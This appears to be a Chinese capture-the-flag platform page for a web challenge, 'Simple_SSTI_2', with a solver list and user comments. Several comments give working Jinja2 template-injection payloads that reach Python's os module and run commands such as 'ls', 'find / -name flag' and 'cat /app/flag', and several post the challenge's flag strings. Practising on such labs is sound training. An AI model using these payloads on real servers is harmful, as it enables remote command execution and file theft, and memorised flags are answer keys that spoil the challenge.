Simple_SSTI_2WEB 未解决
分数:
10
金币:
3
题目作者:
valecalida
一 血:
Tokeii
一血奖励:
3金币
解 决:
15815
提 示:
描 述:
Simple_SSTI_2
评分(15)
解题动态
YameMres 攻破了该题 12小时前
yixcjy 攻破了该题 2天前
DURUI 攻破了该题 3天前
零号酒仓 攻破了该题 3天前
besty2k 攻破了该题 4天前
zttyzz 攻破了该题 4天前
12334 攻破了该题 4天前
PY222 攻破了该题 4天前
魔刀千刃 攻破了该题 4天前
我是CTF大王 攻破了该题 4天前
16671766779 攻破了该题 5天前
海宝宝哈哈 攻破了该题 5天前
遇见遇见 攻破了该题 5天前
th0528 攻破了该题 5天前
/ 攻破了该题 5天前
15195388189 攻破了该题 6天前
18185185996 攻破了该题 11天前
KKsama 攻破了该题 11天前
zhuguangsen 攻破了该题 11天前
评论
210470qq 12月前
举报
flag{43b52fa732d6f8ccbfacea9e989ac07b}
songci 1年前
举报
ssti模板注入,尝试获取OS module进行命令执行或文件读取,使用init.globals来看看有没有os module或者其他的可以读写文件的,爆破获取300存在:{{"".__class__.__mro__[1].__subclasses__()[300].__init__.__globals__}},进行命令执行获取flag:?flag={{""
Mirabelle 1年前
举报
?flag={{config.__class__.__init__.__globals__['os'].popen('ls').read()}}; ?flag={{config.__class__.__init__.__globals__['os'].popen('cat flag').read()}}
ZeronKR1212 1年前
举报
怎么做啊,哥哥们
kimizu 1年前
举报
SSTI模板注入,先尝试搜索有没有flag文件,发现有,cat以下就行 {{config.__class__.__init__.__globals__['os'].popen('find / -name flag').read()}} {{config.__class__.__init__.__globals__['os'].popen('cat /app/flag').read()}}
3347665154 1年前
举报
flag{a0a8ab35c083003f4bb44c7920b69bd1}
jinyuxin 1年前
举报
flag{3da091678f181776084413b87192ea57}
kylin 1年前
举报
flag{b433fd309dca8ad2f3f48656e6c0f548}
Clumsy 1年前
举报
flag{fccecffd6c3b833b580dce1d68f23037} 解决方案:/?flag={{ config.__class__.__init__.__globals__['os'].popen('cat ../app/flag').read() }}%20
浪漫至死不渝 1年前
举报
flag{fffa9cb43e10513975822893a1119edd}